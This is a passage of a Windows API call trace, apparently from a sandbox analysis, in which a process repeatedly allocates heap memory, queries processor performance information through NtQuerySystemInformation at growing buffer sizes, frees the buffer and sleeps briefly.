dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.145] Sleep (dwMilliseconds=0x110) [0197.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.160] Sleep (dwMilliseconds=0x110) [0197.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.173] Sleep (dwMilliseconds=0x110) [0197.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.192] Sleep (dwMilliseconds=0x110) [0197.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.209] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.209] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.209] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.210] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.210] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.210] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.211] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.214] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.215] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.215] Sleep (dwMilliseconds=0x110) [0197.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.240] Sleep (dwMilliseconds=0x110) [0197.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.252] Sleep (dwMilliseconds=0x110) [0197.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.270] Sleep (dwMilliseconds=0x110) [0197.278] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.278] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.285] Sleep (dwMilliseconds=0x110) [0197.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.303] Sleep (dwMilliseconds=0x110) [0197.309] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.309] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.313] Sleep (dwMilliseconds=0x110) [0197.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.333] Sleep (dwMilliseconds=0x110) [0197.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.349] Sleep (dwMilliseconds=0x110) [0197.417] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.417] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.431] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.431] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0197.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0197.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0197.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0197.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.434] Sleep (dwMilliseconds=0x110) [0197.450] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0197.450] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0197.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0197.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0197.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 